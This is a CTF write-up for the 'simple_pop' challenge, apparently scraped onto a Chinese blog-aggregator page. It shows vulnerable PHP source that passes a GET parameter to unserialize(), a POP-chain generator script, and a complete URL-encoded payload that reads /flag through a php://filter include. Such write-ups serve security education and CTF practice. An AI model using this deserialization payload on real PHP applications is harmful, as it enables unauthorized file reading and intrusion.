当前位置:网站首页>BMZCTF simple_ pop
BMZCTF simple_ pop
2022-07-03 04:15:00 【Listen to the snowflakes flying outside】
simple_pop
Open the topic to get the source code
This side is php The test site of pseudo agreement , Need to read useless.php
Decode to get the source code
<?php
class Modifier {
protected $var;
public function append($value){
include($value);//flag.php
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['password'])){
@unserialize($_GET['password']);
}
else{
$a=new Show;
}
?>
This pop The chain is through show Class toString To trigger test Class get Last call Modifier invoke To get flag
<?php
class Modifier
{
protected $var = 'php://filter/convert.base64_encode/resource=/flag';
}
class Show
{
public $source;
public $str;
}
class Test
{
public $p;
}
$m = new Modifier();
$s = new Show();
$t = new Test();
$s -> source = $s;
$s -> str = $t;
$t -> p = $m;
echo urlencode(serialize($s));
structure payload
?password=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A49%3A%22php%3A%2F%2Ffilter%2Fconvert.base64_encode%2Fresource%3D%2Fflag%22%3B%7D%7D%7D
Decode to get flag
边栏推荐
- What are the Bluetooth headsets with good sound quality in 2022? Inventory of four high-quality Bluetooth headsets
- JS realizes the animation effect of text and pictures in the visual area
- Mila、渥太华大学 | 用SE(3)不变去噪距离匹配进行分子几何预训练
- [set theory] ordered pair (ordered pair | ordered triple | ordered n ancestor)
- Leecode swipe questions and record LCP 18 breakfast combination
- The 10th China Cloud Computing Conference · China Station: looking forward to the trend of science and technology in the next decade
- 105. Detailed introduction of linkage effect realization of SAP ui5 master detail layout mode
- 深潜Kotlin协程(二十):构建 Flow
- 2022-07-02: what is the output of the following go language code? A: Compilation error; B:Panic; C:NaN。 package main import “fmt“ func main() { var a =
- CVPR 2022 | Dalian Technology propose un cadre d'éclairage auto - étalonné pour l'amélioration de l'image de faible luminosité de la scène réelle
猜你喜欢
Mila、渥太华大学 | 用SE(3)不变去噪距离匹配进行分子几何预训练
![[nlp] - brief introduction to the latest work of spark neural network](/img/65/35ae0137f4030bdb2b0ab9acd85e16.png)
[nlp] - brief introduction to the latest work of spark neural network
js实现在可视区内,文字图片动画效果
【刷题篇】接雨水(一维)
竞品分析撰写
2022 Shandong Province safety officer C certificate examination questions and Shandong Province safety officer C certificate simulation examination question bank
Which Bluetooth headset is good about 400? Four Bluetooth headsets with strong noise reduction are recommended
[brush questions] connected with rainwater (one dimension)
"Final review" 16/32-bit microprocessor (8086) basic register
解决bp中文乱码
随机推荐
Idea shortcut keys
2022-07-02:以下go语言代码输出什么?A:编译错误;B:Panic;C:NaN。 package main import “fmt“ func main() { var a =
[mathematical logic] predicate logic (first-order predicate logic formula | example)
[set theory] set concept and relationship (set family | set family examples | multiple sets)
[Apple Push] IMessage group sending condition document (push certificate) development tool pushnotification
CVPR 2022 | Dalian Institute of technology proposes a self calibration lighting framework for low light level image enhancement of real scenes
Causal AI, a new paradigm for industrial upgrading of the next generation of credible AI?
vim 的实用操作
Basic types of data in TS
2022 tea master (primary) examination questions and tea master (primary) examination question bank
Pdf editing tool movavi pdfchef 2022 direct download
Bisher - based on SSM pet adoption center
sd卡数据损坏怎么回事,sd卡数据损坏怎么恢复
MySQL timestampdiff interval
[set theory] inclusion exclusion principle (including examples of exclusion principle)
重绘和回流
Nat. Comm. | use tensor cell2cell to deconvolute cell communication with environmental awareness
105. Detailed introduction of linkage effect realization of SAP ui5 master detail layout mode
Mila, University of Ottawa | molecular geometry pre training with Se (3) invariant denoising distance matching
2022deepbrainchain biweekly report no. 104 (01.16-02.15)